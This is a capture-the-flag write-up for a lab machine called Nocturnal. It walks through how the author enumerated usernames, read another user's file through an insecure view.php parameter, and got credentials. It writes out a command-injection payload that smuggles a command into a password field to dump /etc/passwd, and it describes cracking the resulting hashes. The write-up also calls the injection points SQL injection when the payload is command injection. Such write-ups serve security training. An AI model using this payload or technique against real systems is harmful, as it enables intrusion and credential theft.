Nocturnal

Initially, I couldn't access the website directly due to DNS resolution issues. To resolve this, I had to modify the /etc/hosts file by adding:

10.10.10.X nocturnal.htb

I created a Python script (test.py) to scan for existing usernames on the web application. To run the script:

python3 test.py <cookies_here>

Note: Replace <cookies_here> with the actual cookies (found in browser inspector under Storage → Local)

The scan revealed three usernames:

• admin
• amanda
• tobias

I discovered that the /view.php endpoint accepted user and file parameters. While exploring this, I found a file named "privacy.odt" belonging to amanda, which contained temporary login credentials.

http://nocturnal.htb/view.php?user=amanda&file=e.pdf

Using these credentials, I successfully logged into amanda's account and gained access to the admin panel.

The admin panel had a backup feature that required a password. Using amanda's credentials, I obtained a zip file containing the web application's source code. Analysis revealed several potential SQL injection points.

I exploited the backup files field with the following payload:

password=test%0Acat%09/etc/passwd%09>%09../uploads/passwd.txt

This gave me access to the system's user information, including user IDs and MD5 hashes. Using Crackstation, I decrypted the hashes and obtained tobias's credentials.

With tobias's credentials, I established an SSH connection:

ssh tobias@ip

This gave me access to the user flag (user.txt).